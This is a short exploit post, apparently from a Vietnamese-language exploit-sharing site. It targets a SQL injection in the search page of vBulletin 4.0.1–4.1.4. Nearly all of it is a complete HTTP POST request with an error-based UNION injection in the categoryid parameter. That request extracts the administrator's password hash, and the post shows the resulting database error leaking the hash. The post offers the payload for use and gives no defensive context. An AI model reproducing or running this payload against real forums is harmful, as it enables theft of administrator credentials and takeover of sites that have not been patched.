POST /search.php?do=process HTTP/1.1  
Host: 127.0.0.1  
Content-Type: application/x-www-form-urlencoded  
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*

Kết quả ta thu được:

<!--  
Database error in vBulletin 4.1.4:  
Invalid SQL:  
                        SELECT socialgroupcategory.title  
                        FROM socialgroupcategory AS socialgroupcategory  
                        WHERE socialgroupcategory.socialgroupcategoryid IN (-99) union select password from user where userid=1 and row(1,1)&gt;(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*);  
MySQL Error  : Duplicate entry '4c62730e24e31ab9a0b8229a7ff72836:1' for key 'group_key'  
Error Number : 1062  
Request Date : Wednesday, July 20th 2011 @ 10:24:59 PM  
Error Date  : Wednesday, July 20th 2011 @ 10:24:59 PM  
Script    : http://127.0.0.1/search.php?do=process  
Referrer   :   
IP Address  : 127.0.0.1  
Username   : Unregistered  
Classname   : vB_Database  
MySQL Version :   
-->

vBulletin "Search UI" SQL Injection vbb 4.0.1 > 4.1.4

Uploaded by: MIN Software

Views:

Category: Exploit, TUTORIALS, vBulletin

Share

Tweet